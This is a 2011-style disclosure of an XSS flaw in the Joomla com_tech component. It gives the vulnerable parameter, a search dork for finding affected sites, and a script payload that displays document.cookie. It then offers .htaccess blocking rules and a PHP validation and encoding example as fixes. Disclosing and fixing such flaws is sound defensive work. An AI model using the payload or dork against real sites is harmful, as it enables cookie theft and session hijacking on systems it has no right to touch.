<------------------- header data start ------------------- >
#############################################################
Joomla Component Com_tech XSS Vulnerability
#############################################################

# Author : [qrusher-] ~ Bug Researchers

# Date : 07.08.2011

# Name : Joomla com_tech

# Bug Type : XSS

# Infection : Access to information can be obtained.

# Example Vuln :

[+]/index.php?option=com_tech&task=categoria&id_categoria=[EXPLOIT]

[+] Dork:inurl: com_foto

[+] Demo: http://site/index.php?option=com_tech&task=

#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >

><script>alert(document.cookie)</script> // Post Search Box

< -- bug code end of -- >




Many alternatives exist, but if we edit the .htaccess file a little, the problem will go away.


< -- bug code start -- >


Write the code below into the .htaccess file; your site will then return an error on any XSS
attack made against it.

# Refuse (403 Forbidden) query strings that carry base64_encode(...),
# <script> tags (raw or URL-encoded), or try to set PHP GLOBALS / _REQUEST.
RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]


< -- bug code end of -- >
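
The .htaccess rules above test only %{QUERY_STRING}, so a value submitted by POST (the search box noted earlier) never passes through them. One of the other alternatives is to validate and encode inside the component; the following is an added example, not code from com_tech, and the function names and the "search" field name are hypothetical.

```php
<?php
// Added example: hypothetical helpers, not the component's own code.

/** Return id_categoria as a positive integer, or null for anything else. */
function tech_category_id(array $request): ?int
{
    $raw = $request['id_categoria'] ?? null;
    if (!is_string($raw) && !is_int($raw)) {
        return null; // array-valued parameters (id_categoria[]=...) are rejected
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Encode untrusted text for an HTML element body or a quoted attribute value. */
function tech_html(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render the search field, echoing the submitted term back in encoded form. */
function tech_search_field(array $post): string
{
    // "search" is an assumed field name for the search box.
    $term = isset($post['search']) && is_string($post['search']) ? $post['search'] : '';
    return '<input type="text" name="search" value="' . tech_html($term) . '">';
}

// Constructed sample input: one valid id, one carrying markup, one POSTed term.
$valid   = ['id_categoria' => '12'];
$invalid = ['id_categoria' => '12"><b>'];
$post    = ['search' => '"><b>term</b>'];

var_dump(tech_category_id($valid));    // accepted as an integer
var_dump(tech_category_id($invalid));  // rejected instead of being echoed
echo tech_search_field($post), "\n";   // markup arrives as inert text
```

Inside Joomla of that period the framework's own integer filter, JRequest::getInt('id_categoria'), serves the same purpose as tech_category_id().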